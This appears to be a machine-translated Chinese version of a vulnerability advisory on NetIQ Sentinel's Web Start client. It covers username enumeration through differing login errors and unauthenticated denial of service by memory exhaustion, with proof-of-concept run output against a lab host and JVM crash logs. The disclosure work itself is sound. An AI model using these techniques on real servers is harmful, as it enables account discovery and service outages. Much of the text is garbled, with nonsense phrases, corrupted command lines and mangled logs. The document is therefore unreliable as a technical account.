NetIQ定时完全性能安全信息事件管理解决方案SIEM提供特征之一是Java网络启动客户端客户端通过端口8443下载,客户端连接港10013
web启动客户端:账号计数
web启动客户端似乎使用定制协议连接Sentinel服务器协议混合二进制类型/长度和XML有效载荷协议多道举例说,通过 web启动客户端登录Sentinel需要两个单独的SSL连接验证请求发送第一通道 响应回回回回回第二通道
观察 web客户端时发现一件事 服务器对验证请求有不同响应 存在账户与非存在的账户举个例子,如果攻击者试图认证为不存在者Lolwat用户后哨调用名号为'lwat'并不存在则攻击者试图以默认验证管理员记账 Sentinel响应错误密码DBLogin:认证失败:FATAL:用户密码认证失败.从第一个例子中可以看出,这显然是令人关切的问题CWE-203信息破解Tenable创建了POC来证明这个问题下方输出使用is_valid_account.py三次记账管理员有效Lolwat无效和白化病" (valid):
MUSTELIDAE:~badger$python_valid_count.py192.168.19310011962664[+]回复通道:代理.3BAAA5635-B5AE-1034-8881-C29589EDB+MUSTELIDAE:~ badger$ python is_valid_account.py 192.168.1.193 10013 lolwat [+] Connection to 192.168.1.193:10013 as lolwat [+] Session 1 Key: 3BAA5635-B5AE-1034-8898-000C29589EDB0.7552757420650569 [+] Session 2 Key: 3BAA5635-B5AE-1034-889C-000C29589EDB0.2653795890095556 [+] Reply Channel: proxy.reply.3BAA5635-B5AE-1034-889D-000C29589EDB [+] Sending login request on channel 1 [+] Received login response on channel 2 [~] lolwat is not a valid username MUSTELIDAE:~ badger$ python is_valid_account.py 192.168.1.193 10013 albinolobster [+] Connection to 192.168.1.193:10013 as albinolobster [+] Session 1 Key: 3BAA5635-B5AE-1034-88A3-000C29589EDB0.7966160316648959 [+] Session 2 Key: 3BAA5635-B5AE-1034-88A4-000C29589EDB0.01711136605560981 [+] Reply Channel: proxy.reply.3BAA5635-B5AE-1034-88A5-000C29589EDB [+] Sending login request on channel 1 [+] Received login response on channel 2 [!] albinolobster is a valid username!
带下院
执行上述POC快速发现Sentinel易遭少数拒绝服务攻击具体地说,非认证远程攻击者很容易使服务器超出JavaVM内存限值触发失序记忆异常点JVM关闭并重开网络UI(8443港)和Web启动服务器服务器打包日志中的异常点、关机和重新启动看起来像:
2017/01/0910:04++++++++++++++++++++++++++++++2017/01/09 10:04:19 | DEBUG | wrapperp | send a packet PING : ping 2017/01/09 10:04:23 | DEBUG | wrapperp | send a packet PING : ping 2017/01/09 10:04:27 | DEBUG | wrapperp | send a packet PING : ping 2017/01/09 10:04:31 | DEBUG | wrapperp | send a packet PING : ping 2017/01/09 10:04:35 | DEBUG | wrapperp | send a packet PING : ping 2017/01/09 10:04:40 | DEBUG | wrapperp | send a packet PING : ping 2017/01/09 10:04:44 | DEBUG | wrapperp | send a packet PING : ping 2017/01/09 10:04:47 | INFO | jvm 2 | Heap dump file created [1693956755 bytes in 30.545 secs] 2017/01/09 10:04:47 | INFO | jvm 2 | # 2017/01/09 10:04:47 | INFO | jvm 2 | # java.lang.OutOfMemoryError: Requested array size exceeds VM limit 2017/01/09 10:04:47 | INFO | jvm 2 | # -XX:OnOutOfMemoryError="kill -9 %p" 2017/01/09 10:04:47 | INFO | jvm 2 | # Executing /bin/sh -c "kill -9 9204"...2017/01/09 10:04:48 DEBUG包件+++++发送backping:ping2017/01/09 10:04:49ERROR包件++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++2017/01/09 10:04:49详细信息:2017/01/09 10:04:49++++++++++++++++172017/01/09 10:04:49状态包装机+JVM退出响应信号SIGKILL(9)2017/01/09 10:04:49 DEBUG++++++++++++++++++++2017/01/09 10:04/49 DEBUG++++++++2017/01/09 10:04:49
内存耗竭冲破Sentinel服务器九类包触发耗竭 其余用户三类包POC命名类型9ds.py并类型3ds.py.输出似此 :
MOSTELIDAE:~badger$py9_dos.
slSocket.read(1024)sl.SSleofError:EOF违反协议(_sl.c:1752MUSTELIDAE:~bad$python类型3dos.py
slSocket.read(1024)sl.SSLEOFER:EOF违反协议